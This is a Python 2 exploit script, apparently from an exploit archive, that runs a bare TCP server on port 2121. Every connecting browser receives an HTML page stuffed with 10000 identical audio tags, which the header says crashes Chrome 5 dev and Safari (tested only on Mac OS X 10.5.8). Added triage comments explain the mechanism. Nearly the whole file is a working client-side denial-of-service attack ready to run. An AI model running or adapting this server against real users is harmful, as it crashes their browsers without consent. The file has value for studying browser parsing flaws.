#!/usr/bin/python
# Multiple Browsers Audio Tag Denial of Service Vulnerability
# any ogg file can be used for the DoS as long as it is a valid file on the server
# crash reporter for Mac seems to think this is a EXEC_BAD_ACCESS
# This script acts as a web server to DoS connecting clients

# Exploit Title: Multiple Browsers Audio Tag DoS Vulnerability
# Date: April 21th, 2010
# Author: Chase Higgins, http://twitter.com/tzDev
# Software Link: google.com/chrome, apple.com/safari
# Version: Google Chrome 5.0.375.9 dev
# Tested on: Mac OSX 10.5.8
#
# Reading notes for triage:
#   * The fault is on the client: the header above reports a browser crash
#     (EXEC_BAD_ACCESS per the Mac crash reporter). Nothing here targets the
#     machine running the script.
#   * Only Chrome 5.0.375.9 dev on Mac OS X 10.5.8 is listed as tested; the
#     header names Safari as well, but no Safari version is given and no
#     fixed version is stated.
#   * On the wire the response is bare HTML with no status line or headers,
#     carrying 10000 identical <audio> elements. That repetition is the
#     recognisable trait of this test page.
#   * Written for Python 2: the page is a str handed straight to send().

import sys
import socket


def main():
    """Answer every TCP connection on port 2121 with one fixed HTML page.

    The page is an <html>/<body> wrapper around 10000 copies of the same
    <audio> element. Each client is handled in turn: up to 256 bytes of its
    request are read and printed, the page is sent, and the connection is
    closed. The accept loop has no exit condition and the listening socket
    is never closed.
    """
    # The src is reproduced as it appears on this page; the header comment
    # says any valid ogg file on the server will do.
    audio_tag = "<audio src='https://www.exploit-db.com/exploits/12324/myogg.ogg'>"
    html = """ <html> <body> """ + audio_tag * 10000 + """ </body> </html> """

    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # '' binds every local interface, so the page is reachable from any
    # network that can route to port 2121 on this host.
    listener.bind(('', 2121))
    listener.listen(1)

    while True:
        conn, peer = listener.accept()
        # Echo the first 256 bytes of the request to stdout; the request is
        # not parsed, so every path and method gets the same page.
        print(conn.recv(256))
        conn.send(html)
        conn.close()


main()